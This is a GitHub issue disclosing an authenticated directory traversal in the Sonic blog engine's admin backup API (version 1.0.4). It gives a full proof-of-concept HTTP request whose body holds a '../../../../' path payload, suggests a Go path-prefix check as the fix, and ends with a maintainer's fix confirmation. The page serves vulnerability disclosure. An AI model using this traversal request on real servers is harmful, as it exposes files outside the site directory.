Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Back up files in any directory through directory traversal #56

Closed
1 task done
yuyan-sec opened this issue Dec 5, 2022 · 3 comments · Fixed by #61
Closed
1 task done

Back up files in any directory through directory traversal #56

yuyan-sec opened this issue Dec 5, 2022 · 3 comments · Fixed by #61
Labels
bug Something isn't working

Comments

@yuyan-sec
Copy link

Checklist

What is version of Sonic has the issue?

1.0.4

What database are you using?

SQLite3

What is your deployment method?

Executable file

Your site address.

No response

What happened?

Vulnerability Version

1.0.4

Recurring environment

  • Kali Linux
  • Go 1.19.1

Vulnerability Description AND recurrence

Need to log in to the background
Back up files in any directory through directory traversal

POST /api/admin/backups/work-dir HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 35
Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

["../../../../home/kali/Documents"]

1
2

Relevant log output

No response

Additional information

No response

@yuyan-sec yuyan-sec added the bug Something isn't working label Dec 5, 2022
@yuyan-sec
Copy link
Author

修复建议

service/impl/backup.go 添加一个路径判断,只能备份网站目录下的文件。参考zip 功能:http://bit.ly/2MsjAWE

if !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {
    return nil, xerr.NoType.New("").WithMsg(toBackupPath + " illegal file path").WithStatus(xerr.StatusInternalServerError)
}

@yuyan-sec
Copy link
Author

image-20221206153826274

@1379
Copy link
Contributor

1379 commented Dec 15, 2022

Thank you, i have fixed this problem

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants